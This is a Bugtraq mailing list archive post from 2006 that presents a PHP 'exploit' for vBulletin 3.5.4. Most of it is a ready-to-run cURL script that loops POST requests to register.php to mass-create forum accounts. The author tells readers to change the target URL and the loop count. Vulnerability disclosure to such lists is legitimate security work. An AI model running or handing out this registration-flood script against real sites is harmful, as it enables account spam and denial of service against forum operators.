Bugtraq mailing list archives

UPDATE vBulletin Version 3.5.4 exploit

From: dicomdk () gmail com
Date: 15 Aug 2006 01:08:01 -0000

####################### vBulletin Version 3.5.4 #########################
Script     : vBulletin Version 3.5.4
site       : www.vbulletin.com
Exploit by : x-boy 
E-mail     : Dicomdk () gmail com
Type       : Registration flood in register.php 
Thanks to  : Simo64 
#########################################################################
Code of exploit (For english version , you can change it to other language)=> exploit.php 
cURL Must be activated  (http://curl.haxx.se)
Sorry for my bad English :-)
#########################################################################
<?
set_time_limit(60);
//You can change 10 to other numbers  
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request 
$ch = curl_init();
//change http://localhost/vb3 to the url of the script 
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php&apos;);
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 
'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT
 -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished  good luck 
?>
##########################################################################

Current thread:

UPDATE vBulletin Version 3.5.4 exploit dicomdk (Aug 18)
- <Possible follow-ups>
- Re: UPDATE vBulletin Version 3.5.4 exploit scott (Aug 18)